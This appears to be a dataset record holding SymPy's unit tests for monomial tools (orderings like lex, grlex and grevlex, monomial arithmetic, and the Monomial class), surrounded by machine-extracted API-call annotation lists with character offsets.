(4415, 4424), True, 'import numpy as np\n'), ((4392, 4404), 'numpy.str', 'np.str', (['flux'], {}), '(flux)\n', (4398, 4404), True, 'import numpy as np\n'), ((4376, 4387), 'numpy.str', 'np.str', (['bjd'], {}), '(bjd)\n', (4382, 4387), True, 'import numpy as np\n'), ((4362, 4371), 'numpy.str', 'np.str', (['i'], {}), '(i)\n', (4368, 4371), True, 'import numpy as np\n')] |
ichuang/sympy | sympy/polys/tests/test_monomialtools.py | 18afbcc7df2ebf2280ea5a88fde8ece34182ae71 | """Tests for tools and arithmetics for monomials of distributed polynomials. """
from sympy.polys.monomialtools import (
monomials, monomial_count,
monomial_key, lex, grlex, grevlex,
monomial_mul, monomial_div,
monomial_gcd, monomial_lcm,
monomial_max, monomial_min,
monomial_divides,
Monomial,
InverseOrder, ProductOrder
)
from sympy.polys.polyerrors import ExactQuotientFailed
from sympy.abc import a, b, c, x, y, z
from sympy.utilities.pytest import raises
def test_monomials():
assert sorted(monomials([], 0)) == [1]
assert sorted(monomials([], 1)) == [1]
assert sorted(monomials([], 2)) == [1]
assert sorted(monomials([], 3)) == [1]
assert sorted(monomials([x], 0)) == [1]
assert sorted(monomials([x], 1)) == [1, x]
assert sorted(monomials([x], 2)) == [1, x, x**2]
assert sorted(monomials([x], 3)) == [1, x, x**2, x**3]
assert sorted(monomials([x, y], 0)) == [1]
assert sorted(monomials([x, y], 1)) == [1, x, y]
assert sorted(monomials([x, y], 2)) == [1, x, y, x**2, y**2, x*y]
assert sorted(monomials([x, y], 3)) == [1, x, y, x**2, x**3, y**2, y**3, x*y, x*y**2, y*x**2]
def test_monomial_count():
assert monomial_count(2, 2) == 6
assert monomial_count(2, 3) == 10
def test_lex_order():
assert lex((1,2,3)) == (1,2,3)
assert str(lex) == 'lex'
assert lex((1,2,3)) == lex((1,2,3))
assert lex((2,2,3)) > lex((1,2,3))
assert lex((1,3,3)) > lex((1,2,3))
assert lex((1,2,4)) > lex((1,2,3))
assert lex((0,2,3)) < lex((1,2,3))
assert lex((1,1,3)) < lex((1,2,3))
assert lex((1,2,2)) < lex((1,2,3))
def test_grlex_order():
assert grlex((1,2,3)) == (6, (1,2,3))
assert str(grlex) == 'grlex'
assert grlex((1,2,3)) == grlex((1,2,3))
assert grlex((2,2,3)) > grlex((1,2,3))
assert grlex((1,3,3)) > grlex((1,2,3))
assert grlex((1,2,4)) > grlex((1,2,3))
assert grlex((0,2,3)) < grlex((1,2,3))
assert grlex((1,1,3)) < grlex((1,2,3))
assert grlex((1,2,2)) < grlex((1,2,3))
assert grlex((2,2,3)) > grlex((1,2,4))
assert grlex((1,3,3)) > grlex((1,2,4))
assert grlex((0,2,3)) < grlex((1,2,2))
assert grlex((1,1,3)) < grlex((1,2,2))
def test_grevlex_order():
assert grevlex((1,2,3)) == (6, (-3,-2,-1))
assert str(grevlex) == 'grevlex'
assert grevlex((1,2,3)) == grevlex((1,2,3))
assert grevlex((2,2,3)) > grevlex((1,2,3))
assert grevlex((1,3,3)) > grevlex((1,2,3))
assert grevlex((1,2,4)) > grevlex((1,2,3))
assert grevlex((0,2,3)) < grevlex((1,2,3))
assert grevlex((1,1,3)) < grevlex((1,2,3))
assert grevlex((1,2,2)) < grevlex((1,2,3))
assert grevlex((2,2,3)) > grevlex((1,2,4))
assert grevlex((1,3,3)) > grevlex((1,2,4))
assert grevlex((0,2,3)) < grevlex((1,2,2))
assert grevlex((1,1,3)) < grevlex((1,2,2))
assert grevlex((0,1,1)) > grevlex((0,0,2))
assert grevlex((0,3,1)) < grevlex((2,2,1))
def test_InverseOrder():
ilex = InverseOrder(lex)
igrlex = InverseOrder(grlex)
assert ilex((1,2,3)) > ilex((2, 0, 3))
assert igrlex((1, 2, 3)) < igrlex((0, 2, 3))
assert str(ilex) == "ilex"
assert str(igrlex) == "igrlex"
def test_ProductOrder():
P = ProductOrder((grlex, lambda m: m[:2]), (grlex, lambda m: m[2:]))
assert P((1, 3, 3, 4, 5)) > P((2, 1, 5, 5, 5))
assert str(P) == "ProductOrder(grlex, grlex)"
def test_monomial_key():
assert monomial_key() == lex
assert monomial_key('lex') == lex
assert monomial_key('grlex') == grlex
assert monomial_key('grevlex') == grevlex
raises(ValueError, "monomial_key('foo')")
raises(ValueError, "monomial_key(1)")
def test_monomial_mul():
assert monomial_mul((3,4,1), (1,2,0)) == (4,6,1)
def test_monomial_div():
assert monomial_div((3,4,1), (1,2,0)) == (2,2,1)
def test_monomial_gcd():
assert monomial_gcd((3,4,1), (1,2,0)) == (1,2,0)
def test_monomial_lcm():
assert monomial_lcm((3,4,1), (1,2,0)) == (3,4,1)
def test_monomial_max():
assert monomial_max((3,4,5), (0,5,1), (6,3,9)) == (6,5,9)
def test_monomial_min():
assert monomial_min((3,4,5), (0,5,1), (6,3,9)) == (0,3,1)
def test_monomial_divides():
assert monomial_divides((1,2,3), (4,5,6)) is True
assert monomial_divides((1,2,3), (0,5,6)) is False
def test_Monomial():
m = Monomial((3, 4, 1), (x, y, z))
n = Monomial((1, 2, 0), (x, y, z))
assert m.as_expr() == x**3*y**4*z
assert n.as_expr() == x**1*y**2
assert m.as_expr(a, b, c) == a**3*b**4*c
assert n.as_expr(a, b, c) == a**1*b**2
assert m.exponents == (3, 4, 1)
assert m.gens == (x, y, z)
assert n.exponents == (1, 2, 0)
assert n.gens == (x, y, z)
assert m == (3, 4, 1)
assert n != (3, 4, 1)
assert m != (1, 2, 0)
assert n == (1, 2, 0)
assert m[0] == m[-3] == 3
assert m[1] == m[-2] == 4
assert m[2] == m[-1] == 1
assert n[0] == n[-3] == 1
assert n[1] == n[-2] == 2
assert n[2] == n[-1] == 0
assert m[:2] == (3, 4)
assert n[:2] == (1, 2)
assert m*n == Monomial((4, 6, 1))
assert m/n == Monomial((2, 2, 1))
assert m*(1, 2, 0) == Monomial((4, 6, 1))
assert m/(1, 2, 0) == Monomial((2, 2, 1))
assert m.gcd(n) == Monomial((1, 2, 0))
assert m.lcm(n) == Monomial((3, 4, 1))
assert m.gcd((1, 2, 0)) == Monomial((1, 2, 0))
assert m.lcm((1, 2, 0)) == Monomial((3, 4, 1))
assert m**0 == Monomial((0, 0, 0))
assert m**1 == m
assert m**2 == Monomial((6, 8, 2))
assert m**3 == Monomial((9,12, 3))
raises(ExactQuotientFailed, "m/Monomial((5, 2, 0))")
| [((2975, 2992), 'sympy.polys.monomialtools.InverseOrder', 'InverseOrder', (['lex'], {}), '(lex)\n', (2987, 2992), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3006, 3025), 'sympy.polys.monomialtools.InverseOrder', 'InverseOrder', (['grlex'], {}), '(grlex)\n', (3018, 3025), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3219, 3283), 'sympy.polys.monomialtools.ProductOrder', 'ProductOrder', (['(grlex, lambda m: m[:2])', '(grlex, lambda m: m[2:])'], {}), '((grlex, lambda m: m[:2]), (grlex, lambda m: m[2:]))\n', (3231, 3283), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((3576, 3617), 'sympy.utilities.pytest.raises', 'raises', (['ValueError', '"""monomial_key(\'foo\')"""'], {}), '(ValueError, "monomial_key(\'foo\')")\n', (3582, 3617), False, 'from sympy.utilities.pytest import raises\n'), ((3622, 3659), 'sympy.utilities.pytest.raises', 'raises', (['ValueError', '"""monomial_key(1)"""'], {}), "(ValueError, 'monomial_key(1)')\n", (3628, 3659), False, 'from sympy.utilities.pytest import raises\n'), ((4321, 4351), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(3, 4, 1)', '(x, y, z)'], {}), '((3, 4, 1), (x, y, z))\n', (4329, 4351), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((4360, 4390), 'sympy.polys.monomialtools.Monomial', 'Monomial', (['(1, 2, 0)', '(x, y, z)'], {}), '((1, 2, 0), (x, y, z))\n', (4368, 4390), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((5537, 5589), 'sympy.utilities.pytest.raises', 'raises', (['ExactQuotientFailed', '"""m/Monomial((5, 2, 0))"""'], {}), "(ExactQuotientFailed, 'm/Monomial((5, 2, 0))')\n", (5543, 5589), False, 'from sympy.utilities.pytest import raises\n'), ((1202, 1222), 'sympy.polys.monomialtools.monomial_count', 'monomial_count', (['(2)', '(2)'], {}), '(2, 2)\n', (1216, 1222), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1239, 1259), 'sympy.polys.monomialtools.monomial_count', 'monomial_count', (['(2)', '(3)'], {}), '(2, 3)\n', (1253, 1259), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1300, 1314), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1303, 1314), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1365, 1379), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1368, 1379), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1381, 1395), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1384, 1395), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1406, 1420), 'sympy.polys.monomialtools.lex', 'lex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (1409, 1420), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1421, 1435), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1424, 1435), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1445, 1459), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (1448, 1459), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1460, 1474), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1463, 1474), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1484, 1498), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (1487, 1498), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1499, 1513), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1502, 1513), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1524, 1538), 'sympy.polys.monomialtools.lex', 'lex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (1527, 1538), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1539, 1553), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1542, 1553), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1563, 1577), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (1566, 1577), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1578, 1592), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1581, 1592), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1602, 1616), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (1605, 1616), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1617, 1631), 'sympy.polys.monomialtools.lex', 'lex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1620, 1631), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1666, 1682), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1671, 1682), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1742, 1758), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1747, 1758), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1760, 1776), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1765, 1776), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1787, 1803), 'sympy.polys.monomialtools.grlex', 'grlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (1792, 1803), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1804, 1820), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1809, 1820), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1830, 1846), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (1835, 1846), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1847, 1863), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1852, 1863), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1873, 1889), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (1878, 1889), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1890, 1906), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1895, 1906), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1917, 1933), 'sympy.polys.monomialtools.grlex', 'grlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (1922, 1933), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1934, 1950), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1939, 1950), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1960, 1976), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (1965, 1976), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((1977, 1993), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (1982, 1993), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2003, 2019), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2008, 2019), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2020, 2036), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2025, 2036), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2047, 2063), 'sympy.polys.monomialtools.grlex', 'grlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2052, 2063), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2064, 2080), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2069, 2080), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2090, 2106), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2095, 2106), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2107, 2123), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2112, 2123), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2134, 2150), 'sympy.polys.monomialtools.grlex', 'grlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2139, 2150), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2151, 2167), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2156, 2167), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2177, 2193), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2182, 2193), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2194, 2210), 'sympy.polys.monomialtools.grlex', 'grlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2199, 2210), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2247, 2265), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2254, 2265), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2332, 2350), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2339, 2350), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2352, 2370), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2359, 2370), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2381, 2399), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2388, 2399), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2400, 2418), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2407, 2418), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2428, 2446), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 3, 3)'], {}), '((1, 3, 3))\n', (2435, 2446), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2447, 2465), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2454, 2465), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2475, 2493), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 4)'], {}), '((1, 2, 4))\n', (2482, 2493), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2494, 2512), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2501, 2512), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2523, 2541), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(0, 2, 3)'], {}), '((0, 2, 3))\n', (2530, 2541), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2542, 2560), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2549, 2560), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2570, 2588), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 1, 3)'], {}), '((1, 1, 3))\n', (2577, 2588), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2589, 2607), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2596, 2607), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2617, 2635), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 2)'], {}), '((1, 2, 2))\n', (2624, 2635), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2636, 2654), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(1, 2, 3)'], {}), '((1, 2, 3))\n', (2643, 2654), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, monomial_lcm, monomial_max, monomial_min, monomial_divides, Monomial, InverseOrder, ProductOrder\n'), ((2665, 2683), 'sympy.polys.monomialtools.grevlex', 'grevlex', (['(2, 2, 3)'], {}), '((2, 2, 3))\n', (2672, 2683), False, 'from sympy.polys.monomialtools import monomials, monomial_count, monomial_key, lex, grlex, grevlex, monomial_mul, monomial_div, monomial_gcd, 